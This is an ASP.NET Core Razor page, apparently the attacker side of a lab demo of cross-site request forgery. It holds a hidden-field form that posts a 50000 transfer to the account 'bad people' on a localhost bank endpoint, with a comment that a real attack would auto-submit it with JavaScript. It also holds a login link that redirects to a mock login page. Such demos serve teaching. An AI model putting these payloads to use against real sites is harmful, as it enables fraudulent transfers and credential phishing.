@page
@model IndexModel
@{
    ViewData["Title"] = "坏站点";
}

<div class="text-center">
    <h1 class="display-4">Welcome</h1>
    <p>Learn about <a href="https://docs.microsoft.com/aspnet/core">building Web apps with ASP.NET Core</a>.</p>
    
    <div>
        <p>表单执行转账（真正攻击可以用 js 代码自动提交）</p>
        <form action="https://localhost:7167/Bank/Transfer" method="post">
            <label>账号：<input type="hidden" name="toUserName" value="bad people" /></label>
            <label>金额：<input type="hidden" name="amount" value="50000" /></label>
            <input type="submit" value="提交" />
        </form>
        <a href="https://localhost:7167/Login?returnUrl=https%3A%2F%2Flocalhost%3A7272%2FMockLogin">跨站请求伪造链接</a>
    </div>
</div>
